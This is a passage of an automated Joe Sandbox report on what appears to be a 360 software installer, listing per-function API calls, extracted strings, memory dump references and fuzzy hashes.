                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FocusWindow$H_prolog3ItemMessageSendTextVisible_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1096848440-0
                                                                                                                                                                      • Opcode ID: 196d3faee75bc7531dbd78b0a11eeadae58ec8bc6bfc354182befb10a5cb14af
                                                                                                                                                                      • Instruction ID: f5dcf85c22f5723fe5471dfe5163c203cb2ee6a807a18ed24bdfa8064edea089
                                                                                                                                                                      • Opcode Fuzzy Hash: 196d3faee75bc7531dbd78b0a11eeadae58ec8bc6bfc354182befb10a5cb14af
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C51BE75900609AFDB20EBA0DC46BFEB7B9BF20304F104528E516A61D1EF746A14CB61
                                                                                                                                                                      Function 5F52ABF1 Relevance: 12.0, APIs: 8, Instructions: 42threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 5F52ABF7
                                                                                                                                                                        • Part of subcall function 5F52EF97: TlsGetValue.KERNEL32(?,5F52F123,?,5F52E348,00000042,0000083F,00000002,00000000), ref: 5F52EFA0
                                                                                                                                                                        • Part of subcall function 5F52EF97: __decode_pointer.LIBCMT ref: 5F52EFB2
                                                                                                                                                                        • Part of subcall function 5F52EF97: TlsSetValue.KERNEL32(00000000,5F52E348,00000042,0000083F,00000002,00000000), ref: 5F52EFC1
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 5F52AC02
                                                                                                                                                                        • Part of subcall function 5F52EF77: TlsGetValue.KERNEL32(?,?,5F52AC07,00000000), ref: 5F52EF85
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 5F52AC15
                                                                                                                                                                        • Part of subcall function 5F52EFCB: __decode_pointer.LIBCMT ref: 5F52EFDC
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 5F52AC1E
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 5F52AC25
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F52AC2B
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 5F52AC4B
                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 5F52AC5E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1925773019-0
                                                                                                                                                                      • Opcode ID: 4e5a6547060cde2eadd44e823e7951f28015ec688d981571254a98694d2fc301
                                                                                                                                                                      • Instruction ID: 8df7812059f6b34a2be9a367dd2b5f1574b382f07128eecc481a34b2109d81a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e5a6547060cde2eadd44e823e7951f28015ec688d981571254a98694d2fc301
                                                                                                                                                                      • Instruction Fuzzy Hash: F5012CF9403304AFC708AFB5C68894E3BE9AFC4220710867AF449971D1DB35D546CAE1
                                                                                                                                                                      Function 00164680 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 388COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001646A1
                                                                                                                                                                      • GetFileSizeEx.KERNEL32(?,?,00000000,?,00000003), ref: 001646B3
                                                                                                                                                                      • _malloc.LIBCMT ref: 001646E3
                                                                                                                                                                      • SetLastError.KERNEL32(00000008,?,?,?,00004000), ref: 001646F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastSize_malloc_memset
                                                                                                                                                                      • String ID: INIT$PE
                                                                                                                                                                      • API String ID: 942205088-3949469810
                                                                                                                                                                      • Opcode ID: fe97900fe6781a4b73ed487420d7c82f72f4ddf672da06896b2ad2535f04da34
                                                                                                                                                                      • Instruction ID: 19cf82f9d5fda96e285f69e437548799f6fde52f56989a2d1bf18744f9c97436
                                                                                                                                                                      • Opcode Fuzzy Hash: fe97900fe6781a4b73ed487420d7c82f72f4ddf672da06896b2ad2535f04da34
                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE1DEB1A043409BDB24DF24DC41BAB77E4EF95704F08492DFD999B242E771D924CB92
                                                                                                                                                                      Function 0017BBA9 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 306COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$ExistsFileTemp_memset$ActiveCreateDirectoryH_prolog3Window
                                                                                                                                                                      • String ID: D!$http://360.cn$parent=
                                                                                                                                                                      • API String ID: 2807940103-317923980
                                                                                                                                                                      • Opcode ID: 73789289c1d6ea655ba5b20ed91ac4bac749501723f7c4fd50d9c84a7b43dd82
                                                                                                                                                                      • Instruction ID: a6bb4e8acb122314ff7e244b855b6d619eefdfd2819e6a42baf213de18f97c4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 73789289c1d6ea655ba5b20ed91ac4bac749501723f7c4fd50d9c84a7b43dd82
                                                                                                                                                                      • Instruction Fuzzy Hash: B191C531A482085BDB28B7F4ECD7FBD7379AF71720F208519F616AA1D2EF609950C611
                                                                                                                                                                      Function 0017995E Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00179965
                                                                                                                                                                        • Part of subcall function 001774B2: CLSIDFromProgID.COMBASE(?,?), ref: 001774D1
                                                                                                                                                                        • Part of subcall function 001774B2: CoCreateInstance.OLE32(?,?,?,0021E8A0), ref: 001774E9
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00179A94
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00179B14
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00179BB9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeString$CreateFromH_prolog3_catchInstanceProg
                                                                                                                                                                      • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                      • API String ID: 3810993049-1951265404
                                                                                                                                                                      • Opcode ID: 75e66abd5121d897cad7319e493bcca60f1a4b21bef1b547ddc9987d344581a8
                                                                                                                                                                      • Instruction ID: 437f0f9d34da6d4db9f9f2bedfedeaa46ce06d0859b9b395337350df520ce28b
                                                                                                                                                                      • Opcode Fuzzy Hash: 75e66abd5121d897cad7319e493bcca60f1a4b21bef1b547ddc9987d344581a8
                                                                                                                                                                      • Instruction Fuzzy Hash: 6BB1E974A01249EFCF14DFE4C888AADBBB5FF59304F2484A9E54AEB251C7359D49CB20
                                                                                                                                                                      Function 5F4F5B20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 189COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4F5D5B
                                                                                                                                                                        • Part of subcall function 5F516BE8: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,5F4F5BD5,customproxytype,?,FF4173A1), ref: 5F516C13
                                                                                                                                                                        • Part of subcall function 5F516CC7: RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,5F4F5B99,proxytype,00000001,proxytype,?,FF4173A1), ref: 5F516CEB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$CountQueryTick
                                                                                                                                                                      • String ID: customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                      • API String ID: 3766178726-1816664922
                                                                                                                                                                      • Opcode ID: d553db68396a243736ee00c780156ece89518c468a57e7100024718c8afb1fc1
                                                                                                                                                                      • Instruction ID: eef8e5e31f0ab44315d639e7e33a93ca80bcdb35e1549293d8440b29834dc83b
                                                                                                                                                                      • Opcode Fuzzy Hash: d553db68396a243736ee00c780156ece89518c468a57e7100024718c8afb1fc1
                                                                                                                                                                      • Instruction Fuzzy Hash: 387170F1901789AFDB24DFA4C8809EAB7F8FF44310F54852AD55AD7380EB30A649CB91
                                                                                                                                                                      Function 0017D09B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 0017D0A2
                                                                                                                                                                        • Part of subcall function 0017CE6B: __EH_prolog3_GS.LIBCMT ref: 0017CE75
                                                                                                                                                                        • Part of subcall function 0017CE6B: _memset.LIBCMT ref: 0017CEE2
                                                                                                                                                                        • Part of subcall function 0017CE6B: GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 0017CEF9
                                                                                                                                                                        • Part of subcall function 0017CFE7: __EH_prolog3.LIBCMT ref: 0017CFEE
                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000018,0022CC68,00000000,00000018,themes,00000018,0017BEB5,00000000), ref: 0017D0F2
                                                                                                                                                                        • Part of subcall function 001C4C7D: GetModuleHandleW.KERNEL32(sites.dll,0017D12D,0021F258,000000FF,00000000,00000000), ref: 001C4C8B
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,?,00000000,?), ref: 0017D1AF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$CurrentDirectoryExistsFileH_prolog3H_prolog3_H_prolog3_catchHandleLongModuleName_memset
                                                                                                                                                                      • String ID: \NewInstallAir\NewInstallAir.ui$\theme_NewInstallAir.xml$themes
                                                                                                                                                                      • API String ID: 314926721-3980048744
                                                                                                                                                                      • Opcode ID: 04f7ce82bb49a47690e2f107c5a807127664c92723f7df4e93cc7e9c2d930a4f
                                                                                                                                                                      • Instruction ID: ab5c55c048cbaa6d2fe014f33ce03129fe3bc15cbe96e0ab06c524945610753c
                                                                                                                                                                      • Opcode Fuzzy Hash: 04f7ce82bb49a47690e2f107c5a807127664c92723f7df4e93cc7e9c2d930a4f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D51B370E00249DFCF05EBE4C855ABEB7B9AF65710F64804CF51AA7281CB745E45CBA2
                                                                                                                                                                      Function 00198C9F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00198CA6
                                                                                                                                                                        • Part of subcall function 001A72A6: __EH_prolog3.LIBCMT ref: 001A72C5
                                                                                                                                                                        • Part of subcall function 001A72A6: _memset.LIBCMT ref: 001A72EC
                                                                                                                                                                        • Part of subcall function 001A73D5: __EH_prolog3.LIBCMT ref: 001A73F4
                                                                                                                                                                        • Part of subcall function 001A73D5: _memset.LIBCMT ref: 001A7422
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00003001), ref: 00198E38
                                                                                                                                                                        • Part of subcall function 0017AFB8: __EH_prolog3.LIBCMT ref: 0017AFBF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$_memset$ExchangeInterlocked
                                                                                                                                                                      • String ID: .dir$360Installer$\Setup.ini$\custom_wnd.ini
                                                                                                                                                                      • API String ID: 3606139519-1812597268
                                                                                                                                                                      • Opcode ID: a642e5b5b7c846d6fa59ad83deb599caa695923f9632d368830ad0b93c268d05
                                                                                                                                                                      • Instruction ID: 8e23f46a3d8cd8d88d3de074b0d1e1c88eb17b529b02f0c6c7cbbafe7a74cf5e
                                                                                                                                                                      • Opcode Fuzzy Hash: a642e5b5b7c846d6fa59ad83deb599caa695923f9632d368830ad0b93c268d05
                                                                                                                                                                      • Instruction Fuzzy Hash: 42518F71A00249AFCB04EBF4DC96AFE77B8AF66314F104519F216A72D2DF709A44CB61
                                                                                                                                                                      Function 001E2F80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 001E2FCC
                                                                                                                                                                      • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 001E2FF5
                                                                                                                                                                      • _memset.LIBCMT ref: 001E30A2
                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 001E30CA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$Valuelstrcmpi
                                                                                                                                                                      • String ID: Software\360Safe\Liveup$mid
                                                                                                                                                                      • API String ID: 999496690-2395435937
                                                                                                                                                                      • Opcode ID: 42c08ac612b72a4f18158d647829a19264fd3bf176cab8f95d03622d8b58808f
                                                                                                                                                                      • Instruction ID: 142e06426c62be58f98be40d9d60b9d20914be30c39a7ce08eba82c3e3f7eda7
                                                                                                                                                                      • Opcode Fuzzy Hash: 42c08ac612b72a4f18158d647829a19264fd3bf176cab8f95d03622d8b58808f
                                                                                                                                                                      • Instruction Fuzzy Hash: AA411231104B859FE734CB25C859BFFB7E8AF95704F04491DF9AA87181EB319A09CB92
                                                                                                                                                                      Function 5F52074A Relevance: 10.6, APIs: 7, Instructions: 106networkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSASetLastError.WS2_32(0000276D,?,?,?,?,?,?,?), ref: 5F520772
                                                                                                                                                                      • socket.WS2_32(00000002,?,00000000), ref: 5F5207B5
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?), ref: 5F5207C0
                                                                                                                                                                        • Part of subcall function 5F5204A4: WSAAsyncSelect.WS2_32(?,00000000,?,?), ref: 5F5204C4
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000010,?,00000000,?,?,?,?,?,?,?), ref: 5F5207E4
                                                                                                                                                                      • WSAAsyncSelect.WS2_32(?,00000000,?,0000003F), ref: 5F520811
                                                                                                                                                                      • htonl.WS2_32(00000000), ref: 5F52082C
                                                                                                                                                                      • htons.WS2_32(?), ref: 5F520838
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$AsyncSelect$htonlhtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3031483187-0
                                                                                                                                                                      • Opcode ID: 42392e587dc235fff3b34cbb96e18897fc019530812241b0f9fa0e88711bcf88
                                                                                                                                                                      • Instruction ID: 8002378c8238c954b0e39d718f95daf1fd16428e9879cb92e77db6ed0f46e3ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 42392e587dc235fff3b34cbb96e18897fc019530812241b0f9fa0e88711bcf88
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F31A2B16023049BCB109F78C9489AF77F5AF88760B104B3EF857DB5D2D770A9008B90
                                                                                                                                                                      Function 001B4A8C Relevance: 10.6, APIs: 7, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(00000005,?), ref: 001B4AAC
                                                                                                                                                                      • MoveWindow.USER32(?,?,00000104,000000AF,00000050,00000001,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000), ref: 001B4AE4
                                                                                                                                                                      • MoveWindow.USER32(?,?,000000CE,000000AF,00000050,00000001,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000), ref: 001B4B04
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B17
                                                                                                                                                                      • DestroyWindow.USER32(?,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B2E
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B3B
                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,00000000,?,00198E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 001B4B47
                                                                                                                                                                        • Part of subcall function 001A58F3: __EH_prolog3.LIBCMT ref: 001A58FA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Show$Move$ClientDestroyH_prolog3Rect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1342398966-0
                                                                                                                                                                      • Opcode ID: 1d42dc56be4c113047c48021b3cbe4978bd084fb12973d1993b95d6ccc9cff01
                                                                                                                                                                      • Instruction ID: a5290cdbc988ece7929357ce9e9911a45725d328062e5de61af4f8b359f094a6
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d42dc56be4c113047c48021b3cbe4978bd084fb12973d1993b95d6ccc9cff01
                                                                                                                                                                      • Instruction Fuzzy Hash: 4521C076600205BFDB106FB8DD89EFFBBAABF18304F054528FA56D2191DB71A9008B80
                                                                                                                                                                      Function 001EEA8C Relevance: 10.6, APIs: 7, Instructions: 71threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 001EEABD
                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 001EEAC9
                                                                                                                                                                      • __getptd.LIBCMT ref: 001EEAD6
                                                                                                                                                                      • __initptd.LIBCMT ref: 001EEADF
                                                                                                                                                                      • CreateThread.KERNEL32(?,?,001EEA09,00000000,?,?), ref: 001EEB0D
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 001EEB17
                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 001EEB2F
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
